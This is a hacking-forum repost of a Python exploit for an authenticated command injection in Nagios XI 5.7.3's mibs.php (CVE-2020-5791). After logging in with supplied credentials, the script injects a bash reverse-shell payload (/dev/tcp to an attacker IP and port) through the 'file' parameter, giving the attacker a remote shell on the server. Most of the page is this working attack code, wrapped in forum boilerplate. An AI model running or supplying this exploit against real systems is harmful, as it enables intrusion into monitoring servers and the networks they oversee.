Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated) - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月5日3年前

# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
# Date: 10-27-2020
# Vulnerability Discovery: Chris Lyne
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-5791

#!/usr/bin/python3

import re
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Credit: Chris Lyne for vulnerability discovery and original PoC

if len(sys.argv) != 6:
    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/nagiosxi/login.php"
payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()
    login_page = s.get(login_url)
    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
    
    res = s.post(
        login_url,
        data={
            'nsp': nsp,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': '/nagiosxi/index.php?',
            'username': username,
            'password': password,
            'loginButton': ''
        },
        verify=False,
        allow_redirects=True
    )
    
    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
    res = s.get(injection_url)
    
    if res.status_code != 200:
            print("[~] Failed to connect")
    
if __name__ == '__main__':
    exploit()

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索